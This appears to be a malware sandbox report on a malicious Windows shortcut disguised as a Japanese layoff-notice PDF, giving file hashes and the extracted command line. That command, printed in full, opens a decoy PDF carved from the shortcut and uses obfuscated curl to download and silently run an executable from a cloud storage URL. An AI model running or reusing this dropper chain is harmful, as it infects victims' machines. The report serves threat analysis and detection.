Malicious
Characteristics
MD5: 585da0337e9d9a9c1d5bf097bdf8c1f1
SHA1: 16643b92b6012fd58f6c8fa38741435e7c6fe43c
SHA256: 80b875df61fac83d0ff878b6dce5ce67db88c397522e6f6a7ccae5bf882eef0d
SHA384: 27cb5f000543fdac5866798e26197f5a10eaed956fbedf737ba9608a3954080b889ca8165de466f1ed2aadaaba6d69c1
SHA512: 5ba0e05502681db9f1bf95833e88b9b366dc328cec03b9513325772924d059e0023c472a838f23dcf6e5fd4459d7a3f56c34556bf98d6678cfa4785356c7a548
SSDeep: 3072:xJIYJ7JESQJyEAlShBoeDnCVfJUoCBFc4prz1MaZ2Z1Frfh+3pVMwmw:xuUJESjEO6Boej2f7CCQopszMwmw
TLSH: 8A0423DA50D1CAB4C1A1B92A0C3A4F95BA52F70D05C2DEFF31B42D52E2CABD505FB189
Artefacts
Name: LNK: Command Execution
Value:

cmd.exe /c md %TEMP%\vzvqljeo 2>nul&powershell -nop -w 1 -c "$n='リストラ通知書..pdf.lnk';$ds=@((gl).Path,[Environment]::GetFolderPath('Desktop'),(Join-Path $env:USERPROFILE 'Downloads'),$env:USERPROFILE,(Join-Path $env:USERPROFILE 'Documents'));$f=$null;$ds|%{$t=Join-Path $_ $n;if(!$f-and(Test-Path $t)){$f=$t}};if(!$f){gci $env:TEMP -r -fi $n -ea 0|select -f 1|%{$f=$_.FullName}};if($f){$b=[IO.File]::ReadAllBytes($f);$o=Join-Path '%TEMP%\vzvqljeo' 'リストラ通知書..pdf';[IO.File]::WriteAllBytes($o,[byte[]]$b[4433..196053]);saps $o}"&set el=cu&set iz=rl.exe&call %el%%iz% -s -o %TEMP%\vzvqljeo\RuntimeBroker.exe https://storage.googleapis.com/opentokenaiit/newgram.exe&start /b %TEMP%\vzvqljeo\RuntimeBroker.exe

585da0337e9d9a9c1d5bf097bdf8c1f1 (187.64 KB)
No malware configuration was found at this point.
Malicious: 585da0337e9d9a9c1d5bf097bdf8c1f1 > リストラ通知書..pdf.lnk
